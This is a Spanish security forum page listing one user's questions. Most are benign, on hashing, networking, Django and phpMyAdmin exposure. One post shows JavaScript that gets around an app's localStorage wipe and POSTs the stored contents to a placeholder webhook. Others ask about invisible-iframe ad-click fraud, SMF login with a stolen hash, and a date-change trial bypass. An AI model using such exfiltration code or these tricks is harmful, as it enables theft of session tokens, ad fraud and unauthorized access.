elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


  Mostrar Temas
Páginas: [1] 2 3 4
1  Programación / Desarrollo Web / Google ADS | ¿Iframes pagos? en: 16 Junio 2021, 08:39 am
Hola.

Nunca me interesó mucho el asunto de poner publicidad en un sitio web a cambio de unos dólarillos, pero hoy me saltó la curiosidad acerca de una puntual pregunta;

Imaginando que tenemos un sitio (A), en el cual se encuentran las publicidades de Google, y un sitio (B) donde coloco unos iframes invisibles apuntando al sitio A.

¿Google considera esto como una visita real?, ¿o utiliza una simple validación rechazando las visitas con algo como: "Access-Control-Allow-Origin"?

Saludos.
2  Programación / Desarrollo Web / Enviar localstorage mediante webhook desde la consola, error 404 ¿? en: 11 Junio 2021, 10:37 am
Hola.

Estuve informandome acerca del funcionamiento de LocalStorage, siempre me maneje más por el lado de las cookies y estoy obteniendo un error al intentar enviar mediante una webhook desde la consola un valor del mencionado almacenador de información;

Código
  1. function getLocalStoragePropertyDescriptor() {
  2.  const iframe = document.createElement('iframe');
  3.  document.head.append(iframe);
  4.  const pd = Object.getOwnPropertyDescriptor(iframe.contentWindow, 'localStorage');
  5.  iframe.remove();
  6.  return pd;
  7. }
  8.  
  9. Object.defineProperty(window, 'localStorage', getLocalStoragePropertyDescriptor());
  10. const localStorage = getLocalStoragePropertyDescriptor().get.call(window);
  11.  
  12.  

La aplicación al iniciarse limpia y no permite de alguna forma acceder a LocalStorage, por lo tanto utilice esa función que encontré navegando para poder acceder al LocalStorage.

Para corroborar que la función mencionada este en correcto funcionamiento hice una simple impresión desde la consola con:

Código
  1. console.log(LocalStorage);
  2.  

Esto devuelve lo buscado sin ningún problema, por lo tanto la función getLocalStoragePropertyDescriptor está bien.

Luego de eso, intente desde la misma consola poder enviar un webhook, esto funciona correctamente, pero al pasar el contenido de "LocalStorage" a una variable para ser enviado, recibo el error 404.
Este es el código;

Código
  1. function enviarhook() {
  2.      var request = new XMLHttpRequest();
  3.      request.open("POST", "direcciondelhook");
  4.  
  5.      request.setRequestHeader('Content-type', 'application/json');
  6.  
  7.      var msg = LocalStorage; //Linea que causa el error, msg es el contenido que sera enviado mediante POST al webhook. Si en vez de "LocalStorage" le atribuyo cualquier otro contenido, se envia correctamente, pero en cambio si esta tal cual lo presente aqui, recibo un error 400 "POST".
  8.  
  9.      var params = {
  10.        content: msg
  11.      }
  12.  
  13.      request.send(JSON.stringify(params));
  14.    }
  15.  

Quizás esto está prohibido por un tema de seguridad, pero puede ser que este empleando algo mal por lo tanto realizo el post aquí.

La pregunta es; ¿Cuál es el causante del error?

Saludos.
3  Foros Generales / Dudas Generales / Definiciones extraños en identificadores/clases. en: 23 Mayo 2021, 03:11 am
Hola.

He visto desde hace rato varios sitios que contienen nombres extraños en sus identificadores/clases. Mucho más presente en las clases.

En vez de hacer algo como:

Código
  1. <div class="principal">
  2.  

Optan por proporcionarle a la clase un nombre tal como:

Código
  1. <div class="yuRUbfQwsAs">
  2.  

¿Esto lo hacen por alguna razón en especifico, o por qué?

Saludos.
4  Seguridad Informática / Hacking Ético / Acceder a SMF con contraseña hasheada ¿es realmente posible? en: 11 Mayo 2021, 08:08 am
Hola.

Hace años que utilizó SMF, hoy me cruce en el foro con un post interesante:

Inicio de sesión SMF a través de hash de contraseña

En resumen se argumenta que es posible acceder a SMF mediante una contraseña hasheada (haciendo referencia a que gracias a esto, no sirve de nada el hash ante un posible robo de la base de datos).
Esto ya que mediante el método POST que utiliza el formulario de login lo que se hace es enviar la contraseña cifrada + la sesión ID.

Es decir:
Código
  1. SHA1(hash + session_id)
  2.  

Código
  1. <form action="https://tuforo.ejemplo/index.php?action=login2" name="frmLogin" id="frmLogin" method="post" accept-charset="UTF-8" onsubmit="hashLoginPassword(this, 'add5f76205f957b650bb0a5aa71e6ccd');">
  2. <!-- Viendo esto en el onsubmit-->
  3.  

¿Es realmente es esto posible o entendí mal? Supuestamente está "solucionado" en 2.1.

Edit:
Código
  1. //Función mencionada encargada del hash que viene por defecto en SMF.
  2. function hashLoginPassword(doForm, cur_session_id)
  3. {
  4. // Compatibility.
  5. if (cur_session_id == null)
  6. cur_session_id = smf_session_id;
  7.  
  8. if (typeof(hex_sha1) == 'undefined')
  9. return;
  10. // Are they using an email address?
  11. if (doForm.user.value.indexOf('@') != -1)
  12. return;
  13.  
  14. // Unless the browser is Opera, the password will not save properly.
  15. if (!('opera' in window))
  16. doForm.passwrd.autocomplete = 'off';
  17.  
  18. doForm.hash_passwrd.value = hex_sha1(hex_sha1(doForm.user.value.php_to8bit().php_strtolower() + doForm.passwrd.value.php_to8bit()) + cur_session_id);
  19.  
  20. // It looks nicer to fill it with asterisks, but Firefox will try to save that.
  21. if (is_ff != -1)
  22. doForm.passwrd.value = '';
  23. else
  24. doForm.passwrd.value = doForm.passwrd.value.replace(/./g, '*');
  25. }
  26.  
  27.  


Saludos.
5  Seguridad Informática / Seguridad / Recomendación cifrado/hash. en: 28 Abril 2021, 04:12 am
Hola.

Estoy dudando acerca de que cifrado/hash es recomendable utilizar hoy en día para proteger las contraseñas de una base de datos SQL.

¿Cuál recomendarían/utilizarían ustedes?, ¿existe la necesidad de utilizar uno u otro según la circunstancia de uso que se le da?


Saludos.
6  Foros Generales / Foro Libre / Office gratis ¿? en: 16 Abril 2021, 06:31 am
Hola.

Tengo Oficce 2016, la versión sin licencia en la cual te proveen unas semanas de prueba y luego te bloquean la total funcionalidad del paquete.
Hoy mismo estaba navegando y realizando unas operaciones en access y excel y dí con que había caducado el periodo de prueba, por lo tanto no me dejaba realizar ningún procedimiento de las apps (vencía hoy la licencia, por lo tanto, esa es la razón).

Un impulso me llevo a cambiar la fecha de mi ordenador y ejecutar de nuevo las aplicaciones y funcionaron perfectamente.
Es decir, simplemente con cambiar la fecha antes de iniciar algún programa del paquete (una vez iniciado puedes colocar la fecha actual) me funciona todo sin problemas.

¿Eso es un error o qué?, me da curiosidad que una multinacional tal como Microsoft tanga este tipo de "falla".

Saludos.
7  Comunicaciones / Redes / Evitar sniffer en mi red. en: 12 Abril 2021, 06:19 am
Hola.

Tengo una duda, algo que me preocupa realmente es tener algún usuario conectado a mi red que pueda sniffear el contenido.

¿Hay alguna manera de evitarlo?

Saludos.
8  Comunicaciones / Redes / Conectar dos dispositivos mediante cable ethernet. en: 10 Abril 2021, 00:29 am
Hola.

Tengo dos notebooks, de las cuales una tiene problemas para conectarse al wifi (ordenador 1) y solo se conecta mediante una antena usb, y la otra funciona correctamente (ordenador 2).
Por lo visto falla la entrada usb por lo tanto, el ordenador que se conectaba mediante ese contacto a internet, no está funcionando.

Tengo varios cables ethernet por suerte, pero realmente, no me sirve conectar mi ordenador 1 directamente al modem.

¿Podría de alguna forma conectar el ordenador que falla a internet mediante una conexión desde la entrada ethernet del ordenador 1 al ordenador 2?, es decir: conectar una entrada de el cable ethernet en el ordenador 2 y la otra en el ordenador 1 para transmitir internet de esa forma.

Saludos.
9  Programación / Desarrollo Web / ¿Recomendarían DJANGO? en: 9 Abril 2021, 06:27 am
Hola.

Estoy por culminar una aplicación de escritorio que realice para un proyecto, y el siguiente paso es una aplicación web.
Se podría considerar un proyecto serio, por lo tanto necesitaría un lenguaje/framework que valga la pena realmente.

Dicho eso, consideré el framework Django de Python para realizar la aplicación web.
Tengo conocimiento en Python, ví algo de Django y no se me presento ninguna dificultad, entonces para evitar PHP, opte por dicho frame.
La gestión de la base de datos la haría mediante SQLite3.

Por lo tanto, necesitaría su consejo mediante la respuesta a la siguiente pregunta:
¿Pros y contras de Django?
10  Seguridad Informática / Seguridad / /phpmyadmin/ ¿Grave error? en: 6 Abril 2021, 06:27 am
Hola,
 
varias veces me cruce con algún que otro sitio que utiliza phpMyAdmin como gestor para administrar MySQL, y que tenía dicho directorio a la vista y acceso de todos.
Es increíble realmente, la cantidad de sitios que poseen estas fallas sin tener la mínima noción de esto.

Debido a eso me surge una pregunta;
¿Además de la probabilidad de que realicen un ataque de fuerza bruta, o la afección que pueden tener por culpa del setup al alcance de cualquiera, hay algún otro riesgo que se corre?, ¿algún otro directorio al que no deberían tener acceso los usuarios sin privilegios?


Saludos.
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines